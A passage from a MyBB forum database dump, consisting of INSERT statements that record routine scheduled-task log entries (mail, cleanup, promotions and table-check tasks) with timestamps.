'1352469101', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15609', '9', '1352469319', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15610', '3', '1352470013', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15611', '1', '1352470037', 'The hourly cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15612', '7', '1352470043', 'Notice: The check tables task successfully ran and repaired the lthackin_joker.mybb_username_history, lthackin_joker.mybb_username_history table(s).'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15613', '5', '1352470056', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15614', '9', '1352470484', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15615', '5', '1352471442', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15616', '9', '1352471646', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15617', '3', '1352472099', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15618', '9', '1352472138', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15619', '5', '1352472960', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15620', '9', '1352473040', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15621', '3', '1352474248', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15622', '1', '1352474251', 'The hourly cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15623', '7', '1352474263', 'Notice: The check tables task successfully ran and repaired the lthackin_joker.mybb_username_history, lthackin_joker.mybb_username_history table(s).'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15624', '5', '1352474266', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15625', '9', '1352474736', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15626', '5', '1352474843', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15627', '3', '1352475133', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15628', '9', '1352475689', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15629', '5', '1352476804', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15630', '9', '1352476853', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15631', '3', '1352476858', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15632', '1', '1352476979', 'The hourly cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15633', '7', '1352477018', 'Notice: The check tables task successfully ran and repaired the lthackin_joker.mybb_username_history, lthackin_joker.mybb_username_history table(s).'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15634', '5', '1352478016', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15635', '9', '1352478095', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15636', '5', '1352478363', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15637', '9', '1352478376', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15638', '3', '1352478980', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15639', '9', '1352479272', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15640', '5', '1352480047', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15641', '9', '1352482878', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15642', '3', '1352482883', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15643', '1', '1352482887', 'The hourly cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15644', '7', '1352482912', 'Notice: The check tables task successfully ran and repaired the lthackin_joker.mybb_username_history, lthackin_joker.mybb_username_history table(s).'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15645', '5', '1352482997', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15646', '5', '1352484163', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15647', '9', '1352484644', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15648', '3', '1352485928', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15649', '1', '1352485944', 'The hourly cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15650', '7', '1352485947', 'Notice: The check tables task successfully ran and repaired the lthackin_joker.mybb_username_history, lthackin_joker.mybb_username_history table(s).'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15651', '5', '1352486173', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15652', '9', '1352486181', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15653', '9', '1352486427', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15654', '5', '1352488186', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15655', '9', '1352488891', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15656', '3', '1352488898', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15657', '1', '1352488909', 'The hourly cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15658', '7', '1352488914', 'Notice: The check tables task successfully ran and repaired the lthackin_joker.mybb_username_history, lthackin_joker.mybb_username_history table(s).'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15659', '5', '1352489707', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15660', '9', '1352489768', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15661', '3', '1352489783', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15662', '9', '1352490483', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15663', '5', '1352490515', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15664', '9', '1352491075', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15665', '3', '1352491150', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15666', '1', '1352491302', 'The hourly cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15667', '7', '1352491325', 'Notice: The check tables task successfully ran and repaired the lthackin_joker.mybb_username_history, lthackin_joker.mybb_username_history table(s).'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15668', '5', '1352491530', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15669', '9', '1352491872', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15670', '5', '1352492765', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15671', '9', '1352492769', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15672', '3', '1352493091', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15673', '9', '1352493669', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15674', '5', '1352493916', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15675', '9', '1352495564', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15676', '3', '1352495660', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15677', '1', '1352495678', 'The hourly cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15678', '7', '1352495681', 'Notice: The check tables task successfully ran and repaired the lthackin_joker.mybb_username_history, lthackin_joker.mybb_username_history table(s).'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15679', '5', '1352495687', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15680', '5', '1352496304', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15681', '9', '1352496324', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15682', '3', '1352496648', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15683', '9', '1352497479', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15684', '5', '1352497535', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15685', '9', '1352500094', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15686', '3', '1352500417', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15687', '1', '1352501040', 'The hourly cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15688', '7', '1352501041', 'Notice: The check tables task successfully ran and repaired the lthackin_joker.mybb_username_history, lthackin_joker.mybb_username_history table(s).'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15689', '5', '1352501416', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15690', '9', '1352501836', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15691', '3', '1352502897', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15692', '1', '1352502903', 'The hourly cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15693', '7', '1352502969', 'Notice: The check tables task successfully ran and repaired the lthackin_joker.mybb_username_history, lthackin_joker.mybb_username_history table(s).'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15694', '5', '1352502973', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15695', '9', '1352502986', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15696', '5', '1352503645', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15697', '9', '1352503679', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15698', '3', '1352503936', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15699', '9', '1352504891', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15700', '5', '1352505518', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15701', '9', '1352508303', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15702', '3', '1352508306', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15703', '1', '1352508310', 'The hourly cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15704', '2', '1352508323', 'The daily cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15705', '7', '1352508332', 'Notice: The check tables task successfully ran and repaired the lthackin_joker.mybb_username_history, lthackin_joker.mybb_username_history table(s).'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15706', '11', '1352508335', 'The delayed moderation task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15707', '5', '1352508376', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15708', '9', '1352509637', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15709', '3', '1352509655', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15710', '1', '1352510620', 'The hourly cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15711', '7', '1352510626', 'Notice: The check tables task successfully ran and repaired the lthackin_joker.mybb_username_history, lthackin_joker.mybb_username_history table(s).'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15712', '5', '1352511150', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15713', '9', '1352511162', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15714', '3', '1352511168', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15715', '9', '1352511911', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15716', '5', '1352512818', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15717', '9', '1352515345', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15718', '3', '1352515365', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15719', '1', '1352515379', 'The hourly cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15720', '7', '1352515385', 'Notice: The check tables task successfully ran and repaired the lthackin_joker.mybb_username_history, lthackin_joker.mybb_username_history table(s).'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15721', '5', '1352515389', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15722', '5', '1352515545', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15723', '9', '1352516699', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15724', '3', '1352516718', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15725', '1', '1352516954', 'The hourly cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15726', '7', '1352516956', 'Notice: The check tables task successfully ran and repaired the lthackin_joker.mybb_username_history, lthackin_joker.mybb_username_history table(s).'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15727', '5', '1352516971', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15728', '9', '1352517035', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15729', '5', '1352517904', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15730', '9', '1352517934', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15731', '3', '1352518278', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15732', '9', '1352519052', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15733', '5', '1352519133', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15734', '9', '1352519829', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15735', '3', '1352519988', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15736', '1', '1352520209', 'The hourly cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15737', '7', '1352520284', 'Notice: The check tables task successfully ran and repaired the lthackin_joker.mybb_username_history, lthackin_joker.mybb_username_history table(s).'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15738', '5', '1352520371', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15739', '9', '1352520707', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15740', '5', '1352521500', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15741', '9', '1352521513', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15742', '3', '1352521819', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15743', '9', '1352522818', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15744', '5', '1352522823', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15745', '9', '1352523365', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15746', '3', '1352524510', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15747', '1', '1352524614', 'The hourly cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15748', '7', '1352524642', 'Notice: The check tables task successfully ran and repaired the lthackin_joker.mybb_username_history, lthackin_joker.mybb_username_history table(s).'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15749', '5', '1352524649', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15750', '9', '1352524742', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15751', '5', '1352525145', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15752', '9', '1352525261', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15753', '3', '1352525463', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15754', '9', '1352526036', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15755', '5', '1352526305', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15756', '9', '1352526951', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15757', '3', '1352527151', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15758', '1', '1352527213', 'The hourly cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15759', '7', '1352527232', 'Notice: The check tables task successfully ran and repaired the lthackin_joker.mybb_username_history, lthackin_joker.mybb_username_history table(s).'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15760', '5', '1352527657', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15761', '9', '1352527915', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15762', '5', '1352528741', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15763', '9', '1352528838', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15764', '3', '1352529084', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15765', '9', '1352529659', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15766', '5', '1352529913', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15767', '9', '1352530594', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15768', '3', '1352530797', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15769', '1', '1352530825', 'The hourly cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15770', '7', '1352530880', 'Notice: The check tables task successfully ran and repaired the lthackin_joker.mybb_username_history, lthackin_joker.mybb_username_history table(s).'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15771', '5', '1352531307', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15772', '9', '1352531449', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15773', '5', '1352533545', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15774', '9', '1352533770', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15775', '3', '1352533978', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15776', '9', '1352534106', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15777', '3', '1352534380', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15778', '1', '1352534414', 'The hourly cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15779', '7', '1352534418', 'Notice: The check tables task successfully ran and repaired the lthackin_joker.mybb_username_history, lthackin_joker.mybb_username_history table(s).'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15780', '5', '1352535015', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15781', '9', '1352535068', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15782', '5', '1352536018', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15783', '9', '1352536033', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15784', '3', '1352536200', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15785', '9', '1352536997', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15786', '5', '1352537184', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15787', '9', '1352537764', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15788', '3', '1352537959', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15789', '1', '1352538035', 'The hourly cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15790', '7', '1352538046', 'Notice: The check tables task successfully ran and repaired the lthackin_joker.mybb_username_history, lthackin_joker.mybb_username_history table(s).'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15791', '5', '1352538302', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15792', '9', '1352539552', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15793', '5', '1352539925', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15794', '3', '1352541555', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15795', '9', '1352541589', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15796', '5', '1352541657', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15797', '1', '1352541963', 'The hourly cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15798', '7', '1352542052', 'Notice: The check tables task successfully ran and repaired the lthackin_joker.mybb_username_history, lthackin_joker.mybb_username_history table(s).'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15799', '5', '1352542063', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15800', '9', '1352542225', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15801', '5', '1352544717', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15802', '9', '1352544734', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15803', '3', '1352544756', 'The user cleanup task successfully ran.'); INSERT 